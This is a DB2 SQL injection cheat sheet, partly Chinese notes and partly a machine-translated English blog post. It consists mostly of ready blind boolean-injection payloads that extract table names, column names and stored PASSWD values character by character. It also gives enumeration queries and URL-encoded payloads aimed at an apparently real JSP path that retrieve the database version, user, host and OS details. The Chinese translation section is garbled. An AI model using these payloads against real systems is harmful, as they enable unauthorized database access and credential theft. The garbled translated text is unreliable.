以下均是是整形的注入,采用半折法猜解

猜用户表数量:
and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)

猜表长度:
and 3<(SELECT LENGTH(NAME) FROM SYSIBM.SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only)

猜表第一个字符ASCII码:
and 3<(SELECT ASCII(SUBSTR(NAME,1,1)) FROM SYSIBM.SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only)

猜表内列名数量:
and 1<(SELECT COUNT(COLNAME) FROM SYSCAT.columns where TABNAME=’TABLE‘)

猜第一个列名的长度
and 1<(SELECT LENGTH(COLNAME) FROM SYSCAT.columns where TABNAME=’TABLE‘ and colno=0)

猜第一个列名第一个字符的ASCII码
and 1<(SELECT ASCII(SUBSTR(COLNAME,1,1)) FROM SYSCAT.columns where TABNAME=’TABLE‘ and colno=0)

依ID排降序,猜第一个PASSWD的长度
and 0<(SELECT LENGTH(PASSWD) FROM TABLE ORDER BY ID DESC FETCH FIRST 1 ROWS ONLY)

依ID排降序,猜第一个PASSWD第一个字符的ASCII码
and 0<(SELECT ASCII(SUBSTR(PASSWD,1,1)) FROM TABLE ORDER BY ID DESC FETCH FIRST 1 ROWS ONLY)

猜第二个PASSWD第一个字符的ASCII码
and 0<(SELECT ASCII(SUBSTR(PASSWD,1,1)) FROM TABLE where PASSWD not in(’grou1‘) fetch first 1 rows only)


 
 DB2DB2的SQL注入小抄

在寻找由DB2支持的Web应用程序的SQL注入漏洞是不是在我的经验太普通了。当你发现之一,但它支付给准备...

下面是关于如何做的事情你通常通过SQL注入做多一些列说明。所有的测试均在DB2 8.2在Windows下执行的。 

这个职位是SQL注入作弊表系列的一部分。在这一系列中,我endevoured以制表的数据,使其更易于阅读,并为每个数据库后端使用相同的表。这有助于突出显示任何这些特点缺乏为每个数据库和枚举技术,不适用,我也没有得到全面研究领域还。

SQL注入作弊表的完整表单:

I'm not planning to write one for MS Access, but there's a great .

Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query. 

Version select versionnumber, version_timestamp from sysibm.sysversions; Comments select blah from foo; -- comment like this Current User select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1; List Users 
N/A (I think DB2 uses OS-level user accounts for authentication.)

Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

List Password Hashes N/A (I think DB2 uses OS-level user accounts for authentication.) List Privileges select * from syscat.tabauth; -- privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user; List DBA Accounts TODO Current Database select current server from sysibm.sysdummy1; List Databases SELECT schemaname FROM syscat.schemata; List Columns select name, tbname, coltype from sysibm.syscolumns; List Tables select name from sysibm.systables; Find Tables From Column Name TODO Select Nth Row select name from (SELECT name FROM sysibm.systables order by 
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only; Select Nth Char SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b Bitwise AND This page seems to indicate that DB2 has no support for bitwise operators! 
ASCII Value -> Char

select chr(65) from sysibm.sysdummy1; -- returns 'A' Char -> ASCII Value select ascii('A') from sysibm.sysdummy1; -- returns 65 Casting SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1; String Concatenation SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab' 
If Statement

TODO Case Statement TODO Avoiding Quotes TODO Time Delay ??? 
See Heavy Queries article for some ideas.

Make DNS Requests TODO Command Execution TODO Local File Access TODO Hostname, IP Address TODO Location of DB files TODO Default/System Databases TODO This page will probably remain a work-in-progress for some time yet. I'll update it as I learn more. 


版本信息长度:
 /webapp/props4sale/aed_prop.jsp?prop_id=1232 and (select length(rtrim(char(versionnumber))) from sysibm.sysversions)%3E32
服务器名字长度:
 and (select length(rtrim(user)) from sysibm.sysdummy1)%3E128 
服务器名字
 and (select ASCII(substr(rtrim(user),1,1)) from sysibm.sysdummy1)%3E255 
数据库名:
 and (select length(rtrim(current server)) from sysibm.sysdummy1)%3E128 

 and (select ASCII(substr(rtrim(current server),1,1)) from sysibm.sysdummy1)%3E255


猜表:
/webapp/props4sale/aed_prop.jsp?prop_id=1232 and (select count(1) from sysibm.systables where creator=user)%3C63

表名:

/webapp/props4sale/aed_prop.jsp?prop_id=1232 and (select count(1) from sysibm.systables where creator=user)%3C63


%20and%20(select%20length(versionnumber)%20from%20sysibm.sysversions%20)=32%20and%201=1

host_name:
%20and%20(select%20length(host_name)%20from%20sysibmadm.env_prod_info%20)%3C=32%20and%201=1 

os_name:
%20and%20(select%20length(os_name)%20from%20sysibmadm.env_sys_info%20)%3C=32%20and%201=1 

os_version:
%20and%20(select%20length(os_version)%20from%20sysibmadm.env_sys_info%20)%3C=32%20and%201=1 


%20and%20(select%20length(prod_release)%20from%20sysibmadm.env_sys_info%20)%3C=32%20and%201=1

%20and%20(select%20length(user)%20from%20sysibm.sysdummy1%20)=32%20and%201=1

%20and%20(select%20length(user)%20from%20sysibmadm.env_inst_info%20)%3C=32%20and%201=1